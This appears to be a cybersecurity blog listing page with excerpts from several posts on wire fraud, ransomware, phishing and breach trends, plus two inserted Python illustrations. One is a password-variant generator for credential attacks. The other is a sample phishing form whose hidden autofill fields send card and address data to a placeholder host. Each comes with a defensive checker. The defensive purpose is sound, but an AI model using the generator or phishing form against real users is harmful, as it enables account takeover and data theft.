Every day, all over the world, companies fall victim to cyberattacks; it is nearly a constant these days. Many of these attacks are preventable with the right attention to detail in system setup and hardening. Postmortems of these incidents keep returning to three themes: 1) human error; 2) configuration error; and 3) failing to defend proactively. In this series of six posts, we will walk through the anatomy of each attack, its attack vector, and the ways companies can reduce their chances of falling victim to it. In the last post, guest bloggers from G2 Insurance will walk through how insurance companies react to claims, what to watch out for in your policies, and appropriate coverage levels for cyber insurance, based on their experience handling claims.

#1 Email Spoofing and Wire Fraud

At its core, this attack is either the interception and redirection of legitimate wire instructions or a wholly fabricated transfer request. It is an event that comes up daily, or at least weekly, in any cybersecurity professional's world. The threat actor masquerades as a legitimate authority within the company, typically someone at the C-suite or Director level. For the attack to succeed, the recipient of the wire transfer request has to believe it genuinely originated from one of those authoritative people.

One way attackers achieve this is with actual stolen credentials. Despite the flood of data breaches and database hacks, people unfortunately still use weak passwords and reuse passwords across accounts. We have seen dozens of successful credential attacks in which the attacker used publicly available leaked database information to gain unauthorized access to corporate accounts. The approach goes like this: an attacker harvests information about corporate leadership from public data sources (LinkedIn, Dun & Bradstreet, Bloomberg, Google Finance) and chooses a few people to target. The attacker then cross-references those names against leaked credential databases, often hosted on dark web sites, IRC chat rooms, or other forums dedicated to hacking. If a target's other, already-compromised accounts turn up with a password, the attacker tries that password, and tens of thousands of variations of it, against the target's corporate account. Because those variations are generated mechanically (appended years, substituted symbols, changed capitalization), a corporate password that differs from a leaked one only by a suffix offers little protection; multi-factor authentication on the corporate account is what actually stops this step.
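As an added illustration (not part of the original post), the following Python shows both halves of that step: a small attacker-style generator that turns one leaked root word into its common variations, and a password-change check that canonicalizes a candidate password (stripping appended years and symbols, undoing common symbol substitutions) and refuses it if it reduces to a known leaked password. The sample leaked passwords, the substitution tables and the mangling rules are constructed assumptions for the example, not data from any real leak.

```python
import re

# Heuristic de-leet table (assumption: the substitutions attackers most commonly use).
DE_LEET = str.maketrans("@$!013457", "asioleast")
# Forward table used by the attacker-side generator below (also an assumption).
LEETIFY = str.maketrans("aeios", "43105")


def canonical(password):
    """Reduce a password to the root word an attacker's mangling rules start from.

    Order matters: appended years/symbols are stripped before de-leeting, so a
    trailing '2017' is treated as a suffix rather than as substituted letters.
    """
    p = password.lower()
    p = re.sub(r"[^a-z]+$", "", p)      # drop appended years / digits / symbols
    p = p.translate(DE_LEET)            # p@ssw0rd -> password, 5umm3r -> summer
    p = re.sub(r"^[^a-z]+", "", p)      # drop any remaining leading symbols
    return p


def is_mangling_of(candidate, leaked, min_len=6):
    """True if `candidate` is the leaked password or a simple variation of it."""
    c, l = canonical(candidate), canonical(leaked)
    if not c or not l:
        return False
    if c == l:
        return True
    # Containment catches 'mysummer' vs 'summer'; the length floor avoids
    # matching on tiny fragments such as 'pass'.
    return min(len(c), len(l)) >= min_len and (c in l or l in c)


def mangle(root, years=range(2000, 2026), suffixes=("", "!", "!!", "1", "123", "#")):
    """Attacker-side view: the variations a small rule set spins out of one leaked root."""
    bases = {root, root.capitalize(), root.upper(), root.translate(LEETIFY)}
    variants = set()
    for b in bases:
        for s in suffixes:
            variants.add(b + s)
            for y in years:
                variants.add(b + str(y) + s)        # summer2017!
                variants.add(b + str(y)[2:] + s)    # summer17!
    return variants


def reject_if_reused(new_password, leaked_passwords):
    """Password-change gate: refuse anything derived from a known leaked password."""
    return any(is_mangling_of(new_password, old) for old in leaked_passwords)


if __name__ == "__main__":
    # Constructed sample: passwords for this user found in a (fictional) public leak.
    leaked = ["Summer2017", "p@ssw0rd"]
    print(len(mangle("summer")), "variants generated from one leaked root")
    for pw in ["Summer2018!", "P@ssw0rd2019", "5umm3r!!", "correct-horse-battery"]:
        print(pw, "->", "rejected" if reject_if_reused(pw, leaked) else "accepted")
```

The point of the check is that "Summer2018!" is rejected when "Summer2017" has leaked, even though the two strings are different. In production this gate belongs alongside a breached-password lookup service and supplements multi-factor authentication rather than replacing it; the de-leet table is deliberately lossy ("1" could be "l" or "i"), which errs on the side of rejecting.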

Yesterday, organizations around the world were hit by yet another ransomware attack. Like the recent WannaCry attacks, the Petya attack encrypts documents and files and then demands a ransom to unlock them. Unlike WannaCry, the Petya attack is believed to spread internally through an organization (rather than across the Internet) using…

Recently, a widespread global ransomware attack has struck hospitals, communications companies, other businesses, and government offices around the world, locking affected computers until the victims pay a ransom. This widespread ransomware campaign has affected a wide range of organizations, with reports of tens of thousands of infections in as many as 99 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered on the morning of May 12, 2017, by an independent security researcher and has spread rapidly.…

Another week, another well-concocted phishing scam. The most recent fraudulent activity targeted businesses that use Workday, though this is not a breach or vulnerability in Workday itself. Specifically, the attack involves a well-crafted spam email that is sent to employees purporting to be from the CFO, CEO, or Head of HR or similar. Sometimes the…

A Finnish web developer discovered that the "autofill profiles" now offered by certain browsers give attackers a new phishing vector. Autofill profiles allow users to create a profile containing preset personal information that they would usually type into web forms. When a user fills in a few simple text boxes, the autofill system populates the other text boxes on the page from the profile as well, including boxes that are not visible to the user, and from there the attacker harvests the additional autofilled personal information without the user's knowledge.

Autofill profiles are not to be confused with per-field form autofilling, which suggests previously entered values for one form field at a time; autofill profiles let the user fill in an entire web form with one click. …
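To make the mechanism concrete, here is an added example, not from the original post or from the developer's demonstration: a constructed sample of what such a phishing page looks like (two visible boxes plus four that inline CSS keeps out of view, each carrying an autocomplete token the browser can fill from a profile) and a small Python audit, using only the standard library's html.parser, that lists which autofill-eligible fields are visible and which are hidden. The hiding heuristics (display:none, visibility:hidden, opacity:0, off-screen positioning) and the form itself are the example's own assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed sample of the attacker's page: two boxes the user sees, plus four
# the user does not, all tagged so a browser autofill profile will fill them.
SAMPLE_PAGE = """
<form action="https://example.invalid/signup" method="post">
  <label>Name <input type="text" name="name" autocomplete="name"></label>
  <label>Email <input type="email" name="email" autocomplete="email"></label>
  <input type="text" name="phone" autocomplete="tel" style="display:none">
  <input type="text" name="address" autocomplete="street-address"
         style="position:absolute; left:-9999px">
  <input type="text" name="card" autocomplete="cc-number" style="opacity: 0">
  <input type="text" name="company" autocomplete="organization"
         style="visibility:hidden">
  <input type="submit" value="Sign up">
</form>
"""


def is_visually_hidden(style):
    """Heuristic (assumption): inline styles that keep a field out of view but in the DOM."""
    s = re.sub(r"\s+", "", (style or "").lower())
    return bool(
        re.search(r"display:none", s)
        or re.search(r"visibility:hidden", s)
        or re.search(r"opacity:0(?:;|$)", s)       # opacity:0 but not opacity:0.5
        or re.search(r"(?:left|top):-\d+", s)      # pushed off-screen
    )


class AutofillAuditor(HTMLParser):
    """Records every autofill-eligible <input> and whether it is hidden."""

    def __init__(self):
        super().__init__()
        self.fields = []  # (name, autocomplete token, hidden?)

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("type", "text").lower() not in ("text", "email", "tel", "search"):
            return  # hidden/submit/password inputs are not profile-autofilled
        token = a.get("autocomplete", "").strip().lower()
        if token in ("", "off"):
            return
        self.fields.append(
            (a.get("name", ""), token, is_visually_hidden(a.get("style", "")))
        )


def audit(page_html):
    """Split a page's autofill-eligible fields into visible and hidden ones."""
    parser = AutofillAuditor()
    parser.feed(page_html)
    parser.close()
    visible = [(n, t) for n, t, h in parser.fields if not h]
    hidden = [(n, t) for n, t, h in parser.fields if h]
    return visible, hidden


if __name__ == "__main__":
    shown, concealed = audit(SAMPLE_PAGE)
    print("visible fields:", shown)
    print("hidden fields that a profile would still fill:", concealed)
```

Running the audit on the sample reports "name" and "email" as visible and "phone", "address", "card" and "company" as hidden; submitting the form sends all six values. Browsers also infer autofill targets from field names when no autocomplete token is present, so a stricter audit would flag every hidden text input, not only tagged ones, and stylesheet-driven hiding would require rendering the page rather than reading inline styles.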

As we begin the new year, companies are continuing to survey the ever-changing data-breach landscape and assess their own preparedness for the worst. And with data security threats becoming more complex, sophisticated, and diverse every year, it is no small task. For those of you wondering what data breach trends might look like this year, and what to do to avoid them, Experian Data Breach Resolution, drawing on its experience with over 17,000 data breaches over the last decade, offered the following five predictions in its 2017 Data Breach Industry Forecast:

Aftershock password breaches will expedite the death of the password.

What and Why: Companies will face the consequences of previous data breaches, as username and password information breached years earlier (and often from an unrelated company) continues to be sold through darknet markets.

The Takeaway: Companies should consider (1) using multi-factor authentication to verify users to help solve the password reuse problem; (2) accounting for aftershock breaches in their data-breach response plans; and (3) educating customers about resetting their passwords and about the broader risk associated with password reuse across websites.

Nation-state cyberattacks will move from espionage to war.

What and Why: Cyberattacks by hackers sponsored by foreign nations will likely continue to increase and escalate. Although these attacks are motivated by the desire to gain intelligence, they will lead to collateral damage to consumers and businesses through widespread outages or exposure of personal information.

The Takeaway: Businesses should prepare for large-scale attacks, particularly if they are a part of critical infrastructure, by staying vigilant about their security measures and by considering purchasing proper insurance protection.

Healthcare organizations will be the most targeted sector with new, sophisticated attacks emerging.

What and Why:

Medical identity theft will remain cybercriminals’ top target, as medical information is lucrative and easy to exploit.

Experian predicts that in the new year mega breaches will move on from focusing on healthcare insurers to distributed hospital networks, which might have more security challenges compared to centralized organizations.

Experian also predicts that electronic health records (EHRs) will likely be a primary target for attackers, since EHRs are widely used and are likely to touch a compromised computer.

The top breach vector will likely be ransomware, because a disruption of healthcare system operations could be catastrophic and most organizations would rather simply pay the ransom than fight the attack. According to recent guidance from the Office for Civil Rights (OCR), depending on the facts, ransomware attacks may be classified as breaches and require notification under the HIPAA Breach Notification Rule, in accordance with 45 CFR 164.404.

The Takeaway: Healthcare organizations need to ensure they have proper, up-to-date security measures in place, including data-breach response plans in the event of a ransomware attack and adequate employee training about the importance of security.

We have all heard this before, but just how bad are things really? According to Verizon's 2016 Data Breach Investigations Report ("DBIR"), insider and privilege misuse was once again one of the leading causes of incidents and breaches in 2015, accounting for 10,489 incidents, 172 of them with confirmed data disclosure. Some of this misuse is perpetrated by malicious actors motivated by financial gain, and some of it results from the actions of well-meaning employees who either lacked cybersecurity awareness or simply made a mistake.

While there are no perfect answers for addressing the multitude of possible insider attacks, which can range from privilege abuse, to data mishandling, to the use of unapproved hardware, software, and workarounds, to email misuse, implementing the steps below can go a long way in reducing the risks.

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the "Report"), which provides a comprehensive analysis of the data breaches reported to the Attorney General's office during the covered years and sets forth concrete recommendations for the minimum data security that would be considered "reasonable" under California law.

According to the Report, in the past four years, the Attorney General has received reports on 657 data breaches, affecting a total of over 49 million records of Californians. These breaches occurred in all sectors of the economy. The greatest threat to security, both in the number of breaches and the number of records breached, was presented by malware and hacking, followed by physical breaches, breaches caused by insider errors, and breaches caused by insider misuse. The most breached data types were Social Security numbers and medical information.

About Seyfarth's eDiscovery and Information Governance Team

Seyfarth Shaw’s eDiscovery and Information Governance (eDIG) attorneys dedicate 100% of their practices to eDiscovery and information governance issues, advising and litigating on these complex matters efficiently, effectively and creatively. Seyfarth is one of the few law firms with a truly dedicated eDiscovery practice group — one that began well before the Federal Rules of Civil Procedure were amended in 2006. We bring experience and talent to craft practical and defensible approaches to meet discovery obligations in litigation to comply with statutory and regulatory rules while managing the costs and the realities of operating a business in today’s economy. We have worked with some of the country’s largest companies on eDiscovery issues in specific major litigation as well as broader strategic approaches to eDiscovery.